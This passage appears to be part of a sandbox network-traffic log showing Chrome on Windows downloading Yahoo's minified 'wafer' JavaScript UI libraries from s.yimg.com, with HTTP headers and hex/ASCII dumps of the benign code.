                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ouseenter"===X?(c._util.hasMouseenter=!0,c.addEventListeners()):"tabActivate"===X&&e.classList.contains("wf-trigger-activated")&&!e.classList.contains(s)?c.fetch():"onLoad"===X&&c.fetch().then(function(e){e&&c.destroy()}),c}return o(t,e),h(t,[{key:"fetchD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 31 30 30 29 7d 29 2e 63 61 74 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 65 2e 5f 75 74 69 6c 2e 73 74 61 74 75 73 3d 76 6f 69 64 20 30 7d 29 7d 2c 30 29 7d 29 7d 7d 7d 2c 7b 6b 65 79 3a 22 67 65 74 54 61 72 67 65 74 46 6f 72 42 6f 75 6e 64 61 72 79 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 5f 75 74 69 6c 2c 74 3d 65 2e 62 6f 75 6e 64 61 72 79 2c 72 3d 65 2e 65 6c 65 6d 2c 6e 3d 65 2e 74 61 72 67 65 74 2c 69 3d 65 2e 74 61 72 67 65 74 45 6c 65 6d 3b 72 65 74 75 72 6e 20 6e 26 26 28 74 26 26 43 28 72 2c 74 29 7c 7c 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 6e 29 7c 7c 69 7d 7d 2c 7b 6b 65 79 3a 22 67 65 74 54 61 72 67 65 74 45 6c 65 6d 22 2c 76 61 6c 75 65 3a 66 75
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 100)}).catch(function(){e._util.status=void 0})},0)})}}},{key:"getTargetForBoundary",value:function(){var e=this._util,t=e.boundary,r=e.elem,n=e.target,i=e.targetElem;return n&&(t&&C(r,t)||document.body).querySelector(n)||i}},{key:"getTargetElem",value:fu
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 73 74 57 69 74 68 53 74 61 74 65 26 26 21 72 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 50 6f 73 74 20 77 69 74 68 6f 75 74 20 62 6f 64 79 22 29 3b 76 61 72 20 6e 3d 65 2e 5f 75 74 69 6c 2c 69 3d 6e 2e 63 61 63 68 65 2c 61 3d 6e 2e 63 61 63 68 65 4b 65 79 2c 6f 3d 6e 2e 63 61 63 68 65 53 74 72 61 74 65 67 79 2c 73 3d 6e 2e 63 61 63 68 65 54 74 6c 2c 63 3d 6e 2e 63 6f 6e 66 69 67 2c 75 3d 6e 2e 63 72 65 64 65 6e 74 69 61 6c 73 2c 6c 3d 6e 2e 69 6d 70 6f 72 74 61 6e 63 65 2c 66 3d 63 2e 68 65 61 64 65 72 73 7c 7c 7b 7d 3b 72 65 74 75 72 6e 20 41 28 6a 2c 7b 62 6f 64 79 3a 72 2c 63 61 63 68 65 3a 69 2c 63 61 63 68 65 4b 65 79 3a 61 2c 63 61 63 68 65 53 74 72 61 74 65 67 79 3a 6f 2c 63 61 63 68 65 54 74 6c 3a 73 2c 63 6c 69 65 6e 74 48 65 61 64 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: stWithState&&!r)throw new Error("Post without body");var n=e._util,i=n.cache,a=n.cacheKey,o=n.cacheStrategy,s=n.cacheTtl,c=n.config,u=n.credentials,l=n.importance,f=c.headers||{};return A(j,{body:r,cache:i,cacheKey:a,cacheStrategy:o,cacheTtl:s,clientHeade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 76 61 72 20 57 3d 6b 28 50 29 2c 42 3d 66 28 57 2c 31 29 2c 44 3d 42 5b 30 5d 3b 44 7c 7c 28 53 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 74 61 62 49 6e 64 65 78 22 2c 22 2d 31 22 29 2c 44 3d 53 7c 7c 4c 29 2c 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 44 2e 66 6f 63 75 73 28 29 7d 2c 35 29 7d 61 26 26 28 61 2e 63 61 6c 6c 28 65 2c 4c 29 2c 67 2e 73 79 6e 63 41 73 73 65 74 73 28 74 2e 61 73 73 65 74 73 29 2c 77 69 6e 64 6f 77 2e 77 61 66 65 72 2e 5f 5f 5f 64 65 62 75 67 43 6f 6e 74 65 6e 74 26 26 77 69 6e 64 6f 77 2e 77 61 66 65 72 2e 5f 5f 5f 64 65 62 75 67 43 6f 6e 74 65 6e 74 28 74 2e 68 74 6d 6c 7c 7c 74 2e 6d 61 72 6b 75 70 29 29 7d 72 65 74 75 72 6e 20 65 2e 5f 73 74 61 74 65 2e 72 65 74 72 69 65 73 3d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: var W=k(P),B=f(W,1),D=B[0];D||(S.setAttribute("tabIndex","-1"),D=S||L),setTimeout(function(){return D.focus()},5)}a&&(a.call(e,L),g.syncAssets(t.assets),window.wafer.___debugContent&&window.wafer.___debugContent(t.html||t.markup))}return e._state.retries=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 69 73 74 2e 61 64 64 28 22 77 61 66 65 72 2d 66 65 74 63 68 2d 74 61 72 67 65 74 2d 65 72 72 6f 72 22 29 2c 53 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 77 61 66 65 72 2d 66 65 74 63 68 2d 74 61 72 67 65 74 2d 63 6f 6d 70 6c 65 74 65 22 29 29 2c 53 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 77 61 66 65 72 2d 66 65 74 63 68 2d 74 61 72 67 65 74 2d 69 6e 70 72 6f 67 72 65 73 73 22 29 2c 65 2e 5f 73 74 61 74 65 2e 73 74 61 74 75 73 3d 32 2c 21 21 28 22 4e 6f 74 20 66 6f 75 6e 64 22 3d 3d 3d 6e 26 26 75 7c 7c 6c 3d 3d 3d 75 29 26 26 28 73 3f 67 2e 64 65 73 74 72 6f 79 28 63 29 3a 65 2e 64 65 73 74 72 6f 79 28 29 2c 21 30 29 7d 7d 29 7d 72 65 74 75 72 6e 20 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 21 31 29 7d 7d 2c 7b 6b 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ist.add("wafer-fetch-target-error"),S.classList.remove("wafer-fetch-target-complete")),S.classList.remove("wafer-fetch-target-inprogress"),e._state.status=2,!!("Not found"===n&&u||l===u)&&(s?g.destroy(c):e.destroy(),!0)}})}return Promise.resolve(!1)}},{ke


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    110192.168.2.44986987.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC542OUTGET /aaq/wf/wf-lightbox-1.10.6-modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC678INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-id-2: meSrMvVuvhcBbGAgaOyrfwEQwWFSqJ+OiMuSNcs7HWyBAwlNSpK27YpF3rz8f2CsXkga8IyRTgQ=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-request-id: MZ5G0WZ32753K0QN
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 24 Sep 2024 09:43:46 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Wed, 01 Mar 2023 01:43:59 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ETag: "69831b2f7b26bc6dd6321c8dcde85968"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-version-id: K.68hs0p5c2EOJjfXuKP9dx0XBa4hSTK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 13914
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 545837
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 2d 6c 69 67 68 74 62 6f 78 22 2c 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 77 61 66 65 72 2d 6c 69 67 68 74 62 6f 78 22 5d 3d 74 28 29 3a 28 65 2e 77 61 66 65 72 3d 65 2e 77 61 66 65 72 7c 7c 7b 7d 2c 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 3d 65 2e 77 61 66 65 72 2e 77 61 66 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-lightbox",[],t):"object"==typeof exports?exports["wafer-lightbox"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 21 3d 74 79 70 65 6f 66 20 74 26 26 6e 75 6c 6c 21 3d 3d 74 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 2c 20 6e 6f 74 20 22 2b 74 79 70 65 6f 66 20 74 29 3b 65 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 26 26 28 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: {if("function"!=typeof t&&null!==t)throw new TypeError("Super expression must either be null or a function, not "+typeof t);e.prototype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototype
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 26 65 28 74 2e 70 72 6f 74 6f 74 79 70 65 2c 6f 29 2c 6e 26 26 65 28 74 2c 6e 29 2c 74 7d 7d 28 29 2c 70 3d 77 69 6e 64 6f 77 2e 77 61 66 65 72 2c 66 3d 70 2e 62 61 73 65 2c 64 3d 70 2e 63 6f 6e 73 74 61 6e 74 73 2c 77 3d 70 2e 66 65 61 74 75 72 65 73 2c 62 3d 70 2e 75 74 69 6c 73 2c 79 3d 70 2e 57 61 66 65 72 42 61 73 65 43 6c 61 73 73 2c 67 3d 62 2e 62 69 6e 64 45 76 65 6e 74 2c 76 3d 62 2e 66 69 6e 64 41 6e 63 65 73 74 6f 72 2c 6d 3d 62 2e 67 65 74 46 6f 63 75 73 61 62 6c 65 45 6c 65 6d 73 2c 5f 3d 62 2e 67 65 74 54 65 6d 70 6c 61 74 65 43 6f 6e 74 65 6e 74 2c 43 3d 62 2e 72 65 6d 6f 76 65 54 72 61 6e 73 69 74 69 6f 6e 2c 78 3d 62 2e 73 65 74 54 69 6d 65 6f 75 74 2c 45 3d 62 2e 73 65 74 54 72 61 6e 73 69 74 69 6f 6e 2c 6b 3d 62 2e 75 6e 62 69 6e 64 45
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: &e(t.prototype,o),n&&e(t,n),t}}(),p=window.wafer,f=p.base,d=p.constants,w=p.features,b=p.utils,y=p.WaferBaseClass,g=b.bindEvent,v=b.findAncestor,m=b.getFocusableElems,_=b.getTemplateContent,C=b.removeTransition,x=b.setTimeout,E=b.setTransition,k=b.unbindE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 76 6f 69 64 20 30 3d 3d 3d 62 3f 30 3a 4e 75 6d 62 65 72 28 62 29 2c 6b 65 79 3a 64 2c 73 65 6c 65 63 74 6f 72 3a 61 2c 73 75 63 63 65 73 73 43 6c 61 73 73 3a 69 2c 74 61 72 67 65 74 3a 66 2c 74 72 69 67 67 65 72 3a 77 2c 77 72 61 70 70 65 72 4d 61 70 3a 63 7d 2c 6d 26 26 28 68 2e 5f 75 74 69 6c 2e 70 61 67 65 54 61 72 67 65 74 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 6d 29 29 2c 68 2e 5f 73 74 61 74 65 3d 75 28 7b 63 6f 6e 74 65 6e 74 4f 62 73 65 72 76 65 72 3a 6e 75 6c 6c 2c 66 69 72 73 74 46 6f 63 75 73 61 62 6c 65 45 6c 65 6d 3a 6e 75 6c 6c 2c 6c 61 73 74 46 6f 63 75 73 61 62 6c 65 45 6c 65 6d 3a 6e 75 6c 6c 2c 74 6f 75 63 68 65 6e 64 59 3a 30 2c 74 6f 75 63 68 73 74 61 72 74 59 3a 30 2c 77 69 6c 6c 43 6c 6f 73 65 3a 6e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: void 0===b?0:Number(b),key:d,selector:a,successClass:i,target:f,trigger:w,wrapperMap:c},m&&(h._util.pageTarget=document.querySelector(m)),h._state=u({contentObserver:null,firstFocusableElem:null,lastFocusableElem:null,touchendY:0,touchstartY:0,willClose:n
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 72 20 79 3d 62 3d 22 77 61 66 65 72 2d 6c 69 67 68 74 62 6f 78 2d 6c 61 62 65 6c 2d 22 2b 44 61 74 65 2e 6e 6f 77 28 29 3b 64 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 79 29 7d 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 6c 61 62 65 6c 6c 65 64 62 79 22 2c 62 29 7d 73 26 26 28 70 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 77 61 66 65 72 2d 6c 69 67 74 68 62 6f 78 2d 73 6f 75 72 63 65 2d 22 2b 73 29 2c 4d 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 77 61 66 65 72 2d 6c 69 67 74 68 62 6f 78 2d 73 6f 75 72 63 65 2d 22 2b 73 2b 22 2d 6f 70 65 6e 22 29 29 2c 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 6d 6f 64 61 6c 22 2c 21 30 29 2c 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 72 6f 6c 65 22 2c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: r y=b="wafer-lightbox-label-"+Date.now();d.setAttribute("id",y)}p.setAttribute("aria-labelledby",b)}s&&(p.classList.add("wafer-ligthbox-source-"+s),M.classList.add("wafer-ligthbox-source-"+s+"-open")),p.setAttribute("aria-modal",!0),p.setAttribute("role",
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 74 68 69 73 2e 5f 75 74 69 6c 2e 74 72 69 67 67 65 72 26 26 74 68 69 73 2e 6f 70 65 6e 28 29 29 7d 7d 2c 7b 6b 65 79 3a 22 68 61 6e 64 6c 65 54 6f 75 63 68 53 74 61 72 74 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 69 73 2e 5f 73 74 61 74 65 2e 74 6f 75 63 68 73 74 61 72 74 59 3d 65 2e 63 68 61 6e 67 65 64 54 6f 75 63 68 65 73 5b 30 5d 2e 73 63 72 65 65 6e 59 7d 7d 2c 7b 6b 65 79 3a 22 68 61 6e 64 6c 65 54 6f 75 63 68 4d 6f 76 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 74 68 69 73 2c 6f 3d 74 68 69 73 2e 5f 75 74 69 6c 2e 77 72 61 70 70 65 72 4d 61 70 2c 6c 3d 6f 2e 65 6c 65 6d 65 6e 74 54 6f 53 63 72 6f 6c 6c 3b 69 66 28 30 3d 3d 3d 6c 2e 73 63 72 6f 6c 6c 54 6f 70 29 7b 76 61 72 20 72 3d 65 2e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: this._util.trigger&&this.open())}},{key:"handleTouchStart",value:function(e){this._state.touchstartY=e.changedTouches[0].screenY}},{key:"handleTouchMove",value:function(e){var t=this,o=this._util.wrapperMap,l=o.elementToScroll;if(0===l.scrollTop){var r=e.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 5f 75 74 69 6c 2c 74 3d 65 2e 62 6f 75 6e 64 61 72 79 2c 6f 3d 65 2e 65 6c 65 6d 2c 6e 3d 65 2e 74 61 72 67 65 74 2c 6c 3d 65 2e 74 65 6d 70 6c 61 74 65 54 65 78 74 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 75 74 69 6c 2e 74 65 6d 70 6c 61 74 65 54 65 78 74 3d 6c 7c 7c 6e 26 26 5f 28 28 74 26 26 76 28 6f 2c 74 29 7c 7c 4d 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 6e 29 29 2c 74 68 69 73 2e 5f 75 74 69 6c 2e 74 65 6d 70 6c 61 74 65 54 65 78 74 7d 7d 5d 29 2c 74 7d 28 79 29 3b 41 2e 65 76 65 6e 74 73 3d 7b 63 6c 69 63 6b 3a 5b 5b 22 77 61 66 65 72 2d 6c 69 67 68 74 62 6f 78 22 2c 22 68 61 6e 64 6c 65 43 6c 69 63 6b 22 5d 5d 7d 3b 76 61 72 20 50 3d 41 2c 59 3d 4f 62 6a 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ,get:function(){var e=this._util,t=e.boundary,o=e.elem,n=e.target,l=e.templateText;return this._util.templateText=l||n&&_((t&&v(o,t)||M).querySelector(n)),this._util.templateText}}]),t}(y);A.events={click:[["wafer-lightbox","handleClick"]]};var P=A,Y=Obje
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 62 69 6e 64 45 76 65 6e 74 2c 58 3d 77 69 6e 64 6f 77 2e 77 61 66 65 72 2e 62 61 73 65 2c 7a 3d 77 69 6e 64 6f 77 2e 77 61 66 65 72 2e 63 6f 6e 74 72 6f 6c 6c 65 72 73 2e 57 61 66 65 72 42 61 73 65 43 6f 6e 74 72 6f 6c 6c 65 72 2c 47 3d 64 6f 63 75 6d 65 6e 74 2c 51 3d 47 2e 62 6f 64 79 2c 5a 3d 47 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 24 3d 22 73 63 72 6f 6c 6c 22 3d 3d 3d 77 69 6e 64 6f 77 2e 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 29 2e 6f 76 65 72 66 6c 6f 77 59 3f 51 3a 5a 2c 65 65 3d 76 6f 69 64 20 30 2c 74 65 3d 76 6f 69 64 20 30 2c 6f 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 29 7b 76 61 72 20 65 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: bindEvent,X=window.wafer.base,z=window.wafer.controllers.WaferBaseController,G=document,Q=G.body,Z=G.documentElement,$="scroll"===window.getComputedStyle(document.body).overflowY?Q:Z,ee=void 0,te=void 0,oe=function(e){function t(){var e=arguments.length>0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 2c 7b 6f 76 65 72 66 6c 6f 77 3a 22 68 69 64 64 65 6e 22 7d 29 29 2c 79 2e 5f 73 74 61 74 65 2e 6c 61 73 74 53 63 72 6f 6c 6c 59 3d 65 2c 79 2e 5f 73 74 61 74 65 2e 63 75 72 72 65 6e 74 49 6e 73 74 61 6e 63 65 3d 74 68 69 73 2c 79 2e 5f 73 74 61 74 65 2e 6f 70 65 6e 3d 21 30 7d 2c 50 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 6e 64 6c 65 53 77 69 70 65 43 6c 6f 73 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 79 2e 5f 63 6c 6f 73 65 28 7b 73 6f 75 72 63 65 3a 22 73 77 69 70 65 43 6c 6f 73 65 22 7d 29 7d 2c 62 2e 5f 72 65 6e 64 65 72 4c 69 67 68 74 42 6f 78 57 72 61 70 70 65 72 28 29 2c 62 2e 73 79 6e 63 28 29 2c 62 7d 72 65 74 75 72 6e 20 63 28 74 2c 65 29 2c 42 28 74 2c 5b 7b 6b 65 79 3a 22 5f 63 6c 6f 73 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ,{overflow:"hidden"})),y._state.lastScrollY=e,y._state.currentInstance=this,y._state.open=!0},P.prototype.handleSwipeClose=function(){y._close({source:"swipeClose"})},b._renderLightBoxWrapper(),b.sync(),b}return c(t,e),B(t,[{key:"_close",value:function(){
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC1300INData Raw: 65 6e 74 28 22 6c 69 67 68 74 62 6f 78 3a 63 6c 6f 73 65 22 2c 7b 65 6c 65 6d 3a 69 2c 6d 65 74 61 3a 7b 73 6f 75 72 63 65 3a 6e 2c 74 61 72 67 65 74 45 6c 65 6d 3a 66 7d 7d 29 7d 2c 70 29 7d 7d 7d 2c 7b 6b 65 79 3a 22 5f 68 61 6e 64 6c 65 43 6c 6f 73 65 43 6c 69 63 6b 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 74 68 69 73 2e 5f 63 6c 6f 73 65 28 29 7d 7d 2c 7b 6b 65 79 3a 22 5f 68 61 6e 64 6c 65 42 67 43 6c 6f 73 65 43 6c 69 63 6b 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 5f 6f 70 74 69 6f 6e 73 2e 70 72 6f 70 73 2e 77 72 61 70 70 65 72 4d 61 70 2c 6f 3d 74 2e 77 72 61 70 70 65 72 45 6c 65 6d 3b 65 2e 74 61 72 67 65 74 3d 3d 3d 6f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ent("lightbox:close",{elem:i,meta:{source:n,targetElem:f}})},p)}}},{key:"_handleCloseClick",value:function(e){e.preventDefault(),this._close()}},{key:"_handleBgCloseClick",value:function(e){var t=this._options.props.wrapperMap,o=t.wrapperElem;e.target===o


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    111192.168.2.44987787.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC364OUTGET /aaq/wf/wf-text-1.2.0-modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:02 UTC709INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-id-2: YtTp6V8505Fo5uOUHOTeHOef3/V8Qmwkkd+aq83wA1tHKWNCCekEVLHYqcb6VVAUAxB8HmzOl9UE+k+FjcBUPBSvEyytcY3ewxzJnE8darc=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-request-id: WE1FY9BA7DS8SMSD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 24 Sep 2024 12:03:05 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Mon, 23 Aug 2021 06:24:25 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ETag: "956dabf4d28930bc42d934995b814d6d"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-version-id: 8acCB8Oldv6HTX7VU3iQtZux9BoZJqhX
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 3412
